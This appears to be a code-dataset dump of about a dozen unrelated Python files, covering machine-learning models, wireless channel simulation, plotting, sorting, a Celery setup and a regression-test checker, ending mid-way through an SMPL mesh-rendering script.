index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
7,600 | 7a6a8b5e344a7b60e369f100885d1e26afa28f46 | from django.apps import AppConfig
class AppValidationsConfig(AppConfig):
    """Django application configuration for the ``app_validations`` app."""

    name = 'app_validations'
|
7,601 | 3a0bf031b76d2df03cdb5b37861cb8942307709c | import spacy
nlp = spacy.load("en_core_web_lg")
def find_entities(corpus):
    """Run the spaCy pipeline over *corpus* and group entity texts by label.

    Returns a dict mapping entity label -> list of unique entity strings.
    """
    doc = nlp(corpus)
    grouped = {}
    for span in doc.ents:
        grouped.setdefault(span.label_, set()).add(span.text)
    return {label: list(names) for label, names in grouped.items()}
|
7,602 | 74ffbd55867c4b2c6ccbef7d94e0c65aef139057 | import os
import pathlib
from global_settings import *
def get_bits(x):
    """Map signal values to bits: negative -> 0, non-negative -> 1."""
    negative_mask = x < 0
    return np.where(negative_mask, 0, 1)
def check_wrong_bits(bits, bits_estimated):
    """Count the positions where the estimated bits differ from the true bits."""
    mismatches = bits != bits_estimated
    return int(np.count_nonzero(mismatches))
def mkdir(file_path):
    """Create the parent directory of *file_path* if it does not exist.

    Fixes two defects of the previous version: ``os.makedirs('')`` raised
    FileNotFoundError when *file_path* had no directory component, and the
    exists-then-create sequence was racy; ``exist_ok=True`` is atomic.
    """
    folder = os.path.dirname(file_path)
    if folder:
        os.makedirs(folder, exist_ok=True)
def mkfile(file_path):
    """Ensure *file_path* exists as a file, creating parent directories first."""
    mkdir(file_path)
    pathlib.Path(file_path).touch(exist_ok=True)
def concatenate(total, part):
    """Append *part* to the running array *total*; ``None`` starts a new one."""
    if total is None:
        return part
    return np.concatenate((total, part))
def complex_channel(m=NUM_ANT, n=NUM_ANT):
    """Draw an i.i.d. Gaussian complex channel in its 2m x 2n real form.

    The complex matrix H = A + jB is represented as [[A, -B], [B, A]].
    """
    a = np.random.randn(m, n)
    b = np.random.randn(m, n)
    top_half = np.column_stack((a, -b))
    bottom_half = np.column_stack((b, a))
    return np.row_stack((top_half, bottom_half))
def make_channel_batch():
    """Build a channel batch: one random channel per packet, repeated for
    every time slot of that packet."""
    batch = None
    for _ in range(PACKETS_PER_BATCH):
        channel = complex_channel().reshape([1, 2 * NUM_ANT, 2 * NUM_ANT])
        for _ in range(TIME_SLOTS_PER_PACKET):
            batch = concatenate(batch, channel)
    return batch
def signal_batch(batch_size=TIMES_SLOTS_PER_BATCH):
    """Draw *batch_size* random QPSK candidate columns as a
    (batch, 2*NUM_ANT, 1) array."""
    batch = None
    picks = np.random.uniform(low=0, high=QPSK_CANDIDATE_SIZE, size=batch_size)
    for slot in range(batch_size):
        column = int(picks[slot])
        symbol = QPSK_CANDIDATES[:, column:column + 1].reshape([1, 2 * NUM_ANT, 1])
        batch = concatenate(batch, symbol)
    return batch
def random_distance(n, length):
    """Return n distances from the centre of a length x length square,
    with each coordinate drawn uniformly per axis."""
    half = length / 2
    dx = np.random.uniform(-1, 1, [n, 1, 1]) * half
    dy = np.random.uniform(-1, 1, [n, 1, 1]) * half
    return np.sqrt(dx * dx + dy * dy)
def zf_batch(y, h):
    """Zero-forcing detection: pseudo-invert each channel, then slice the
    sign into QPSK symbols scaled by 1/sqrt(2)."""
    h_transposed = np.transpose(h, axes=[0, 2, 1])
    gram = h_transposed @ h
    estimate = np.linalg.inv(gram) @ h_transposed @ y
    return np.where(estimate < 0, -1, 1) / np.sqrt(2)
def lmmse_batch(y, h):
    """LMMSE-style detection over a batch of channels.

    Solves z = (H^T H + c*I)^-1 H^T y per batch element and maps the result
    to QPSK symbol signs scaled by 1/sqrt(2).
    """
    assert len(h.shape) == 3
    batch_size, m, n = h.shape
    # NOTE(review): the identity is scaled by batch_size and the concatenate
    # wraps a single element (it relies on broadcasting over the batch axis).
    # Scaling the regulariser by batch size looks suspicious -- an SNR-derived
    # constant would be more usual; confirm against the caller.
    eye = np.concatenate([np.eye(n).reshape([1, n, n]) * batch_size], axis=0)
    ht = np.transpose(h, axes=[0, 2, 1])
    z = np.linalg.inv(ht @ h + eye) @ ht @ y
    return np.where(z < 0, -1, 1) / np.sqrt(2)
def maximum_likelihood_detect_bits(y, h):
    """Maximum-likelihood detection: pick, per batch element, the QPSK
    candidate closest to y in Euclidean distance and return its bits.

    The previous version computed the distance matrix vectorized, then a
    dead ``if True/else`` left a per-candidate loop that appended a second,
    duplicated set of distance columns; argmin always hit the first copy, so
    dropping the loop preserves the result while halving the work.
    """
    assert len(h.shape) == 3
    batch_size, m, n = h.shape
    s_mld = np.zeros([batch_size, n, 1])
    # (batch, candidates): squared distance to every candidate in one pass.
    dst = np.sum(np.square(y - h @ QPSK_CANDIDATES), axis=1)
    min_indexes = dst.argmin(1)
    for i, t in enumerate(min_indexes):
        s_mld[i:i + 1, :, :] = QPSK_CANDIDATES[:, t].reshape([1, 2 * NUM_ANT, 1])
    return get_bits(s_mld)
|
7,603 | 1c5884c10ac0b6a3335f8e677007fc52311245e2 | # coding=utf-8
"""Advent of Code 2018, Day 7"""
import networkx
import re
# Build the dependency graph: an edge pre -> post means step `pre` must be
# completed before step `post` can start.
G = networkx.DiGraph()
with open("puzzle_input") as f:
    for line in f.read().split("\n"):
        match = re.search("Step (?P<pre>[A-Z]).*step (?P<post>[A-Z])", line)
        # Fix: a trailing blank line (or any malformed line) makes re.search
        # return None, and match.group() raised AttributeError.
        if match:
            G.add_edge(match.group("pre"), match.group("post"))
def part_one():
    """Solution to Part 1: task order, ties broken alphabetically."""
    order = networkx.lexicographical_topological_sort(G)
    return "".join(order)
def part_two():
    """Solution to Part 2.

    Simulates 5 workers completing tasks; task X takes ord(X) - 4 seconds
    (60 + its position in the alphabet, since ord('A') == 65).  ``tasks``
    maps each in-progress task to its remaining time.
    """
    tasks = {}
    current_time = 0
    while G.nodes():
        # noinspection PyCallingNonCallable
        # Startable tasks: all prerequisites done and not already in progress.
        candidate_next_tasks = [task for task in G.nodes()
                                if task not in tasks.keys() and G.in_degree(task) == 0]
        if candidate_next_tasks and len(tasks) < 5:
            # A worker is free: start the alphabetically first candidate.
            next_task = sorted(candidate_next_tasks)[0]
            tasks[next_task] = ord(next_task) - 4
        else:
            # All workers busy (or nothing startable): jump to the next
            # completion, retire that task and release its dependents.
            min_task_time = min(tasks.values())
            current_time += min_task_time
            # Invert the dict to find a task with minimal remaining time.
            completed_task = dict(zip(tasks.values(), tasks.keys()))[min_task_time]
            tasks = {k: v - min_task_time for k, v in tasks.items() if k != completed_task}
            G.remove_node(completed_task)
    return current_time
|
7,604 | d4bc6bfe6bef730273db38f3c99352bbc3f48a5f | import os
from celery import Celery
import django
from django.conf import settings
from django.apps import apps
# Point Celery at the project's Django settings before they are imported.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'nightcrawler.settings')
#celery_app = Celery('nightcrawler.tasks.keep_it', broker=settings.CELERY_BROKER_URL)
celery_app = Celery('nightcrawler', broker=settings.CELERY_BROKER_URL)
# Load Celery configuration from the Django settings module.
celery_app.config_from_object('django.conf:settings')
# Discover tasks.py modules in every installed Django app.
celery_app.autodiscover_tasks(lambda: settings.INSTALLED_APPS)
#celery_app.autodiscover_tasks()
@celery_app.task(bind=True)
def debug_task(self):
    """Print the wrapping task request; useful to verify a worker is alive."""
    print('Request: {0!r}'.format(self.request))
|
7,605 | e24a62f2a3ff0122922f472a7b37f1773dfe9c11 | import tensorflow as tf
from util.helper import focal_loss
from util.helper import conv_elu_bn
from util.helper import deconv_elu_bn
from util.helper import residual_block_elu
from util.helper import conv_elu
from util.helper import conv
from util.helper import reg_l1_loss
from util.helper import conv_bn
from util.helper import deconv
from util.helper import max_pool2d
from util.helper import upsample_layer
from util.helper import hourglass_module
from util.helper import conv_block
from util.helper import bottlenect_block_v1
from util.helper import pyramid_pooling_block
# 0 cat , 1 dog,
class model_objectdetection_ppm_centernet_v1:
    """CenterNet-style detector with a pyramid-pooling (PPM) backbone.

    Builds a TF1 (``tf.compat.v1``) static graph at construction time:
    a per-class heatmap head plus a 2-channel size head on a 128x128 grid,
    for 512x512 RGB inputs.
    """

    def __init__(self, sess, class_count):
        # The session is owned by the caller; the graph is built immediately.
        self.sess = sess
        self.class_count = class_count
        self.up_sample_rate = 1
        self.feature_channels = 32
        #self.hourglass_channel = 32
        with tf.variable_scope('CenterNet'):
            self._build_net()

    def _build_net(self):
        """Construct placeholders, backbone, heads, losses and the optimizer."""
        self.learning_rate_tensor = tf.compat.v1.placeholder(tf.float32, shape=[], name='learning_rate')
        print(self.learning_rate_tensor)
        self.X = tf.compat.v1.placeholder(tf.float32, [None, 512, 512, 3], name='X')
        print(self.X)
        # Boolean train/inference flag consumed by the batch-norm layers.
        self.keep_layer = tf.compat.v1.placeholder(tf.bool, name='phase')
        print(self.keep_layer)
        self.Y = tf.compat.v1.placeholder(tf.float32, [None, 128, 128, self.class_count], 'Y')
        # NOTE(review): the third positional argument of placeholder() is
        # `name`, so this size placeholder is also named 'Y' (TF uniquifies it
        # to 'Y_1'); probably meant 'SIZE', but renaming would change exported
        # node names -- confirm before fixing.
        self.SIZE = tf.compat.v1.placeholder(tf.float32, [None, 128, 128, 2], 'Y')
        print(self.Y)
        ## Batch , Height , Width, Class
        #X_input = tf.compat.v1.reshape(self.X, [-1, 512, 512, 3])
        #Y_input = tf.compat.v1.reshape(self.Y, [-1, 128, 128, self.class_count])
        # 512x512 -> progressively downsampled by three stride-2 conv blocks.
        with tf.variable_scope('downsamples'):
            stage_1_1 = conv_block(self.X, conv_type='conv', filters=16, kernel_size=3, strides=2, training=self.keep_layer)
            stage_1_2 = conv_block(stage_1_1, conv_type='ds', filters=32, kernel_size=3, strides=2, training=self.keep_layer)
            stage_1_3 = conv_block(stage_1_2, conv_type='ds', filters=64, kernel_size=3, strides=2, training=self.keep_layer)
        with tf.variable_scope('feature_extraction'):
            feature1 = bottlenect_block_v1(inputs=stage_1_3, filters=64, kernel_size=3, upsample_rate=2, strides=2, repeat=2, training=self.keep_layer, name='residual1')
            feature2 = bottlenect_block_v1(inputs=feature1, filters=64, kernel_size=3, upsample_rate=2, strides=2, repeat=2, training=self.keep_layer, name='residual2')
            feature3 = bottlenect_block_v1(inputs=feature2, filters=32, kernel_size=3, upsample_rate=2, strides=1, repeat=2, training=self.keep_layer, name='residual3')
        with tf.variable_scope('pyramid_pooling'):
            pyramid = pyramid_pooling_block(feature3, kernel_size=32, input_width=32, input_height=32, bin_sizes=[2, 4, 6, 8])
        with tf.variable_scope('featurefuse'):
            # Fuse the early high-resolution features with the upsampled
            # pyramid features at 128x128.
            feature_fuse_layer1 = conv_block(stage_1_3, conv_type='conv', filters=160, kernel_size=1, strides=1, training=self.keep_layer)
            print('test',feature_fuse_layer1)
            feature_fuse_layer2 = upsample_layer(pyramid, [128, 128])
            depthwise_filter = tf.compat.v1.get_variable('feature_fuse_layer2', [3, 3, 32 * 5, 1], initializer=tf.compat.v1.variance_scaling_initializer())
            feature_fuse_layer2 = tf.compat.v1.nn.depthwise_conv2d(input=feature_fuse_layer2, filter=depthwise_filter, strides=[1, 1, 1, 1], padding='SAME')
            print('feature_deptiwise conv=', feature_fuse_layer2)
            feature_fuse_layer2 = tf.compat.v1.layers.batch_normalization(feature_fuse_layer2, scale=True, center=True, momentum=0.9, training=self.keep_layer)
            feature_fuse_layer2 = tf.compat.v1.nn.relu(feature_fuse_layer2)
            feature_fuse_layer2 = tf.compat.v1.layers.conv2d(inputs=feature_fuse_layer2, filters=1, kernel_size=1, strides=1, padding='same', kernel_initializer=tf.compat.v1.variance_scaling_initializer())
            # Addition broadcasts the single-channel fused map over the
            # 160-channel projection.
            final_feature = feature_fuse_layer2 + feature_fuse_layer1
            final_feature = tf.compat.v1.layers.batch_normalization(final_feature, scale=True, center=True, momentum=0.9, training=self.keep_layer)
            final_feature = tf.compat.v1.nn.relu(final_feature)
        with tf.variable_scope('classifier'):
            classifiter = conv_block(final_feature, conv_type='ds', filters=64, kernel_size=3, strides=1, training=self.keep_layer)
            #classifiter = conv_block(classifiter, conv_type='ds', filters=64, kernel_size=3, strides=1, training=self.keep_layer)
            print("=== network structure ===")
        with tf.variable_scope("detector"):
            # Heatmap head: per-class centre probabilities in [0, 1].
            #self.cls = conv_elu_bn(feature_fuse_layer2, filters=self.feature_channels, training=self.keep_layer, kernel_size=3, strides=1, name='detector_convelu1')
            self.cls = conv(classifiter, filters=self.class_count, kernel_size=1, strides=1, name='detector_conv1')
            self.cls = tf.compat.v1.nn.sigmoid(self.cls, name="heatmap")
            # Size head: non-negative (w, h) regression per grid cell.
            #self.size = conv_elu_bn(feature_fuse_layer2, filters=self.feature_channels, training=self.keep_layer, kernel_size=3, strides=1, name='detector_convelu2')
            self.size = conv(classifiter, filters=2, kernel_size=1, strides=1, name='detector_conv2')
            self.size = tf.compat.v1.nn.relu(self.size, name='sizemap')
            print("heatmap sigmoid=", self.cls)
        self.output = self.cls;
        print("=== network structure ===")
        # Total loss: focal loss on the heatmap + weighted L1 on the sizes.
        self.heatmap_loss = focal_loss(self.output, self.Y)
        self.size_loss = reg_l1_loss(self.size, self.SIZE)
        self.cost = self.heatmap_loss + 0.1 * self.size_loss
        # define cost/loss & optimizer; the UPDATE_OPS dependency keeps the
        # batch-norm moving averages updated on every train step.
        update_ops = tf.compat.v1.get_collection(tf.compat.v1.GraphKeys.UPDATE_OPS)
        with tf.compat.v1.control_dependencies(update_ops):
            self.optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=self.learning_rate_tensor).minimize(self.cost, name='AdamMinimize')
        print("==============Node Name List==============")
        print("learning rate tensor : ", self.learning_rate_tensor)
        print("Input Node Name : ", self.X)
        print("Output 4 Train Node Name : ", self.Y)
        print("Phase Node Name", self.keep_layer)
        print("Output Node Name (heatmap) : ", self.output)
        print("Output Node Name (sizemap) : ", self.size)
        print("Cost Function Node Name : ", self.cost)
        print("Run this operation for a train step :", self.optimizer.name)
        print("==============Node Name List==============")

    def predict(self, x_test, keep_prop=False):
        """Run inference; returns (heatmap, sizemap) for a batch of images."""
        return self.sess.run([self.output, self.size], feed_dict={self.X: x_test, self.keep_layer: keep_prop})

    def get_cost(self, x_test, y_test, y_size, keep_prop=False):
        """Evaluate the combined loss without updating any weights."""
        # print(self.sess.run(self.output, feed_dict={self.X: x_test, self.keep_layer: keep_prop}))
        return self.sess.run(self.cost, feed_dict={self.X: x_test, self.Y: y_test, self.SIZE:y_size, self.keep_layer: keep_prop})

    def train(self, x_data, y_data, y_size, keep_prop=True, learn_rate=0.003):
        """Run one Adam optimisation step on a batch."""
        return self.sess.run(self.optimizer, feed_dict={self.X: x_data, self.Y: y_data, self.SIZE:y_size, self.keep_layer: keep_prop, self.learning_rate_tensor: learn_rate})
7,606 | 75754f4032d6e22e53cdbed0f6c640247473faec | import matplotlib.pyplot as plt
import cartopy.crs as ccrs
from cartopy.feature import ShapelyFeature
from shapely.geometry import shape
def plot(s):
    """Draw shapely geometry *s* on a PlateCarree (equirectangular) map.

    Returns the gridliner so the caller can tweak the labels further.
    """
    axes = plt.axes(projection=ccrs.PlateCarree())
    minx, miny, maxx, maxy = s.bounds
    axes.set_extent((minx, maxx, miny, maxy), crs=ccrs.PlateCarree())
    feature = ShapelyFeature([s], ccrs.PlateCarree(), facecolor='#AAFFAA', edgecolor='k')
    axes.add_feature(feature)
    grid = axes.gridlines(crs=ccrs.PlateCarree(), draw_labels=True,
                          linewidth=2, color='gray', alpha=0.5, linestyle='--')
    grid.xlabels_top = False
    grid.ylabels_left = False
    grid.xlabel_style = {'size': 10, 'color': 'black'}
    grid.ylabel_style = {'size': 10, 'color': 'black'}
    return grid
def plot_merc(s):
    """Draw shapely geometry *s* on a Mercator map.

    The geometry itself is given in PlateCarree (lon/lat) coordinates;
    returns the gridliner for further label tweaking.
    """
    axes = plt.axes(projection=ccrs.Mercator())
    minx, miny, maxx, maxy = s.bounds
    axes.set_extent((minx, maxx, miny, maxy), crs=ccrs.PlateCarree())
    feature = ShapelyFeature([s], ccrs.PlateCarree(), facecolor='#AAFFAA', edgecolor='k')
    axes.add_feature(feature)
    grid = axes.gridlines(crs=ccrs.PlateCarree(), draw_labels=True,
                          linewidth=2, color='gray', alpha=0.5, linestyle='--')
    grid.xlabels_top = False
    grid.ylabels_left = False
    grid.xlabel_style = {'size': 10, 'color': 'black'}
    grid.ylabel_style = {'size': 10, 'color': 'black'}
    return grid
7,607 | cd1987f09ca3e09ac251b1ebdec4168fd5dbdd0e | # 2. Отсортируйте по возрастанию методом слияния одномерный вещественный массив,
# заданный случайными числами на промежутке [0; 50).
# Выведите на экран исходный и отсортированный массивы.
from random import randint
# Build an array of `size` random numbers from [0, 50) and show it.
# NOTE(review): the task statement above asks for real (floating-point)
# numbers, but randint produces integers -- confirm which is intended.
size = 13
array = [randint(0, 50) for x in range(size)]
print('*' * 30)
print('Initial array:')
print(array)
print('*' * 30)
def merge_sort(merged_arr: list):
    """Recursively merge-sort *merged_arr* in place.

    :param merged_arr: list to sort (mutated in place)
    :return: the sorted list (returned for convenience)
    """
    # A list of zero or one elements is already sorted.  Returning the list
    # itself fixes the previous version, which returned None here and made
    # `print(merge_sort(x))` print None for trivial inputs.
    if len(merged_arr) <= 1:
        return merged_arr
    # split the array into left and right halves
    middle = len(merged_arr) // 2
    left = merged_arr[:middle]
    right = merged_arr[middle:]
    # sort each half recursively
    merge_sort(left)
    merge_sort(right)
    # merge the sorted halves and copy the result back in place
    comb_arr = merge(left, right)
    for i in range(len(merged_arr)):
        merged_arr[i] = comb_arr[i]
    return merged_arr


def merge(merge_1: list, merge_2: list):
    """Merge two pre-sorted lists into one sorted list.

    :param merge_1: first sorted list
    :param merge_2: second sorted list
    :return: merged, sorted list
    """
    # pre-size the output with zeros
    merged_arr = [0] * (len(merge_1) + len(merge_2))
    i = k = n = 0
    # take the smaller head element until one input is exhausted
    while i < len(merge_1) and k < len(merge_2):
        if merge_1[i] <= merge_2[k]:
            merged_arr[n] = merge_1[i]
            i += 1
            n += 1
        else:
            merged_arr[n] = merge_2[k]
            k += 1
            n += 1
    # copy whatever remains of either input
    while i < len(merge_1):
        merged_arr[n] = merge_1[i]
        i += 1
        n += 1
    while k < len(merge_2):
        merged_arr[n] = merge_2[k]
        k += 1
        n += 1
    return merged_arr
# Sort the array in place and print the result.
print('Merge sorted array:')
print(merge_sort(array))
print('*' * 30)
|
7,608 | 517436d61ac9993bee5ecfd932f272dbb8bec60b | class Region:
"""
A region (represented by a list of long/lat coordinates).
"""
def __init__(self, coords, r_votes, d_votes, o_votes):
self.coords = coords
def lats(self):
"Return a list of the latitudes of all the coordinates in the region"
return [y for x,y in self.coords]
def longs(self):
"Return a list of the longitudes of all the coordinates in the region"
return [x for x,y in self.coords]
def min_lat(self):
"Return the minimum latitude of the region"
return min(self.lats())
def min_long(self):
"Return the minimum longitude of the region"
return min(self.longs())
def max_lat(self):
"Return the maximum latitude of the region"
return max(self.lats())
def max_long(self):
"Return the maximum longitude of the region"
return max(self.longs())
|
7,609 | b7521a604fb49591df814d469f53d35574126fdb | import pandas
def ludwig_get_model_definition(df: 'Dataframe', target: str, features: list):
    """Build a Ludwig model-definition dict from a dataframe.

    Numeric columns become 'numerical' features (mean-filled, z-scored);
    string columns become 'category' features.

    :param df: source dataframe
    :param target: name of the output column
    :param features: names of the input columns
    :raises TypeError: if a column is neither numeric nor string dtype
    """
    numeric_preprocessing = {'missing_value_strategy': 'fill_with_mean',
                             'normalization': 'zscore'}
    input_features, output_features = [], []
    for p in features:
        if pandas.api.types.is_numeric_dtype(df[p]):
            input_features.append({'name': p, 'type': 'numerical',
                                   'preprocessing': dict(numeric_preprocessing)})
        elif pandas.api.types.is_string_dtype(df[p]):
            input_features.append({'name': p, 'type': 'category'})
        else:
            raise TypeError(f'column {p} value isnt number or string')
    if pandas.api.types.is_numeric_dtype(df[target]):
        output_features.append({'name': target, 'type': 'numerical',
                                'preprocessing': dict(numeric_preprocessing)})
    # Bug fix: this branch tested df[p] (the stale loop variable) instead of
    # df[target], so a string-typed target raised TypeError whenever the last
    # feature was numeric.
    elif pandas.api.types.is_string_dtype(df[target]):
        output_features.append({'name': target, 'type': 'category'})
    else:
        raise TypeError(f'column {target} value isnt number or string')
    return {
        'input_features' : input_features,
        'output_features': output_features,
    }
|
7,610 | d03669924233edf33fcb6645f5ed7ab118f54a95 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Check mean system norm errors in regression tests
This script determines the pass/fail status of a regression test by comparing
the "Mean System Norm" values output at each timestep against "gold values"
from the reference file provided by the user.
Success is determined by the following criteria: the number of timesteps in the
log file matches the number of timesteps in the gold file, and for each
timestep the system norms meet the absolute and relative tolerances (default
1.0e-16 and 1.0e-7 respectively). The tolerances can be adjusted using command
line arguments, pass `-h` to get a brief usage message.
"""
import sys
import os
import math
import subprocess
import argparse
from shutil import copyfile
def parse_arguments():
    """Parse the command line for the regression-test check utility."""
    arg_parser = argparse.ArgumentParser(
        description="Nalu-Wind regression test check utility")
    arg_parser.add_argument('--abs-tol', type=float, default=1.0e-15,
                            help="Tolerance for absolute error")
    arg_parser.add_argument('--rel-tol', type=float, default=1.0e-7,
                            help="Tolerance for relative error")
    arg_parser.add_argument("test_name", help="Regression test name")
    arg_parser.add_argument("gold_norms",
                            help="Absolute path to the gold norms file")
    arg_parser.add_argument('--save-norm-file', required=False,
                            help="File in which to save a copy of the norms")
    return arg_parser.parse_args()
def load_norm_file(fname):
    """Parse a norm file and return the mean system norms.

    Each line's first whitespace-separated token is taken as a float.
    Returns [] when the file is missing or malformed.
    """
    try:
        with open(fname, 'r') as fh:
            return [float(line.strip().split()[0]) for line in fh]
    # Narrowed from a bare `except`, which also swallowed KeyboardInterrupt
    # and SystemExit: OSError covers a missing/unreadable file, ValueError a
    # non-numeric token, IndexError an empty line.
    except (OSError, ValueError, IndexError):
        return []
def generate_test_norms(testname):
    """Parse the log file and generate test norms.

    Extracts the "Mean System Norm" lines from <testname>.log into
    <testname>.norm via awk, optionally copies the norm file, and returns
    the parsed norms.
    """
    logname = testname + ".log"
    norm_name = testname + ".norm"
    # Columns 4-6 of each matching log line carry the norm values.
    cmdline = """awk '/Mean System Norm:/ { print $4, $5, $6; }' %s > %s """%(
        logname, norm_name)
    os.system(cmdline)
    # NOTE(review): re-parses sys.argv even though main() already did;
    # harmless but redundant -- consider passing the Namespace in instead.
    args = parse_arguments()
    if (args.save_norm_file != None):
        copyfile(norm_name, args.save_norm_file)
    return load_norm_file(norm_name)
def get_run_time(testname):
    """Return the STKPERF total time from <testname>.log, or "" on failure."""
    logname = testname + ".log"
    cmdline = """awk '/STKPERF: Total Time/ { print $4; }' %s """%(
        logname)
    try:
        pp = subprocess.run(cmdline, shell=True, check=True, capture_output=True)
        return pp.stdout.decode('UTF-8').strip()
    # Narrowed from a bare `except`: check=True raises CalledProcessError
    # when awk/the shell fails; OSError covers a missing shell.  The bare
    # form also swallowed KeyboardInterrupt.
    except (subprocess.SubprocessError, OSError):
        return ""
def check_norms(test_norms, gold_norms, atol, rtol):
    """Check the regression test norms against the gold norms.

    A timestep passes if its absolute OR relative difference is within
    tolerance.  Returns (passed, max_abs_diff, max_rel_diff).
    """
    if len(test_norms) != len(gold_norms):
        print("Number of timesteps do not match", flush=True)
        return (False, 1.0e16, 1.0e16)
    test_pass = True
    abs_diff = 0.0
    rel_diff = 0.0
    for t1, t2 in zip(test_norms, gold_norms):
        adiff = abs(t1 - t2)
        # Guard the zero-gold case: t1/t2 used to raise ZeroDivisionError.
        if t2 != 0.0:
            rdiff = abs(t1 / t2 - 1.0)
        else:
            rdiff = 0.0 if adiff == 0.0 else math.inf
        abs_diff = max(abs_diff, adiff)
        rel_diff = max(rel_diff, rdiff)
        if (adiff > atol) and (rdiff > rtol):
            test_pass = False
    return (test_pass, abs_diff, rel_diff)
def main():
    """Driver function: compare test norms to gold norms and exit 0/1."""
    args = parse_arguments()
    test_norms = generate_test_norms(args.test_name)
    gold_norms = load_norm_file(args.gold_norms)
    run_time = get_run_time(args.test_name)
    # get_run_time returns "" on failure; report 0.0 in that case.
    run_time = float(run_time) if run_time else 0.0
    status, adiff, rdiff = check_norms(
        test_norms, gold_norms, args.abs_tol, args.rel_tol)
    # Fixed-width summary: PASS/FAIL, padded name, runtime, max abs/rel diffs.
    name = args.test_name.ljust(40, ".")
    status_str = "PASS:" if status else "FAIL:"
    print("%s %-40s %10.4fs %.4e %.4e"%(
        status_str, name, run_time, adiff, rdiff), flush=True)
    sys.exit(0 if status else 1)


if __name__ == "__main__":
    main()
|
7,611 | 2540e2752edaedbf2a011a25cb90f220ae770757 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue May 19 17:27:57 2020
@author: li
"""
import numpy as np
from opendr.renderer import ColoredRenderer
from opendr.lighting import LambertianPointLight
from opendr.camera import ProjectPoints
import cPickle as pkl
from models.smpl import Smpl, copy_smpl, joints_coco
import h5py
from util import im
from render_model import render_model
from util.imutils import crop
import cv2
import matplotlib.pyplot as plt
from os.path import join
import scipy.io as sio
# Kept for reference; the render loop below hard-codes its own index range.
index = 800
#test_path = '../SPIN_MV/data/h36m_train_S1s_3d.npz'
test_path = '../SPIN/data/dataset_extras/h36m_valid_protocol1.npz'
#spin = '../SPIN_MV/S1_single_smplify.npz'
spin = '../SPIN_MV/temp/logs_b16_e20_full_3d_mix/eval_h36m_spin.npz'
#our = '../SPIN_MV/S1_multi_smplify.npz'
our = '../SPIN_MV/temp/logs_b16_e20_full_3d_mix/eval_h36m_our.npz'
# Ground-truth annotations plus the SPIN baseline and our predictions.
mpi_inf_valid = np.load(test_path)
ROOT = '../SPIN_MV/data/'
mpi_inf_spin = np.load(spin)
mpi_inf_pred = np.load(our)
IMG_RES = 224
focal_length = 5000
# SMPL body-model parameters (Python 2 pickle).
model_file = 'SMPL_python_v.1.0.0/smpl/models/basicmodel_m_lbs_10_207_0_v1.0.0.pkl'
with open(model_file, 'rb') as fp:
    model_data = pkl.load(fp)
fig = plt.figure()
#plt.ion()
#gt_keypoints = np.zeros((400,24,4))
# For each selected example: crop the source image, render the SMPL mesh for
# both our prediction and the SPIN baseline, and save three borderless PNGs
# (original, ours, SPIN).
for i in range(70563,70564):
    imgname = mpi_inf_valid['imgname'][i]
    #print(join(ROOT,imgname))
    # BGR -> RGB, float copy for cropping.
    rgb_img = cv2.imread(join(ROOT,imgname))[:,:,::-1].copy().astype(np.float32)
    center = mpi_inf_valid['center'][i]
    scale = mpi_inf_valid['scale'][i]
    rgb_img = crop(rgb_img, center, scale, [IMG_RES, IMG_RES])
    # --- our prediction ---
    pose = mpi_inf_pred['pose'][i]
    betas = mpi_inf_pred['betas'][i]
    camera = mpi_inf_pred['camera'][i]
    #gt_keypoints[i*batch_size*4+k*4+j] = mpi_inf_valid['S'][i*batch_size+j][k]
    # Convert weak-perspective (s, tx, ty) to a camera translation.
    camera_t = np.array([camera[1],camera[2], 2*focal_length/(IMG_RES*camera[0] +1e-9)])
    w, h = (IMG_RES, IMG_RES)
    rn = ColoredRenderer()
    pred_base_smpl = Smpl(model_data)
    pred_base_smpl.pose[:] = pose
    pred_base_smpl.betas[:] = betas
    pred_rot = np.eye(3)
    rn.camera = ProjectPoints(t=camera_t, rt=cv2.Rodrigues(pred_rot)[0].reshape(3), c=np.array([112, 112]),
                              f=np.array([5000,5000]), k=np.zeros(5), v=pred_base_smpl)
    dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])
    verts = pred_base_smpl.r
    im = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20+dist) * 255.).astype('uint8')
    # --- SPIN baseline ---
    pose_spin = mpi_inf_spin['pose'][i]
    betas_spin = mpi_inf_spin['betas'][i]
    camera = mpi_inf_spin['camera'][i]
    camera_t_spin = np.array([camera[1],camera[2], 2*focal_length/(IMG_RES*camera[0] +1e-9)])
    rn = ColoredRenderer()
    pred_base_smpl.pose[:] = pose_spin
    pred_base_smpl.betas[:] = betas_spin
    rn.camera = ProjectPoints(t=camera_t_spin, rt=cv2.Rodrigues(pred_rot)[0].reshape(3), c=np.array([112, 112]),
                              f=np.array([5000,5000]), k=np.zeros(5), v=pred_base_smpl)
    dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])
    verts = pred_base_smpl.r
    im_spin = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20+dist) * 255.).astype('uint8')
    # Flip the global orientation (rotate 180 deg around z) for an
    # alternative SPIN view; rendered but its save below is disabled.
    ort = np.reshape(pose_spin[:3],(3,1))
    #print(ort)
    ort_mat = cv2.Rodrigues(ort)[0]
    #print(ort_mat)
    trans_mat = np.array([[-1,0,0],
                          [0,-1,0],
                          [0,0,1]])
    new_ort = ort_mat.dot(trans_mat)
    pred_base_smpl.pose[:3] = cv2.Rodrigues(new_ort)[0].reshape(3)
    rn.camera = ProjectPoints(t=camera_t, rt=cv2.Rodrigues(pred_rot)[0].reshape(3), c=np.array([112, 112]),
                              f=np.array([5000,5000]), k=np.zeros(5), v=pred_base_smpl)
    dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])
    verts = pred_base_smpl.r
    im_1 = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20+dist) * 255.).astype('uint8')
    # --- save the cropped original ---
    fig = plt.figure()
    #plt.subplot(1,3,1)
    plt.imshow(rgb_img)
    height, width, channels = rgb_img.shape
    # with dpi=300 the saved image size equals height*width
    fig.set_size_inches(width/100.0/3.0, height/100.0/3.0)
    plt.gca().xaxis.set_major_locator(plt.NullLocator())
    plt.gca().yaxis.set_major_locator(plt.NullLocator())
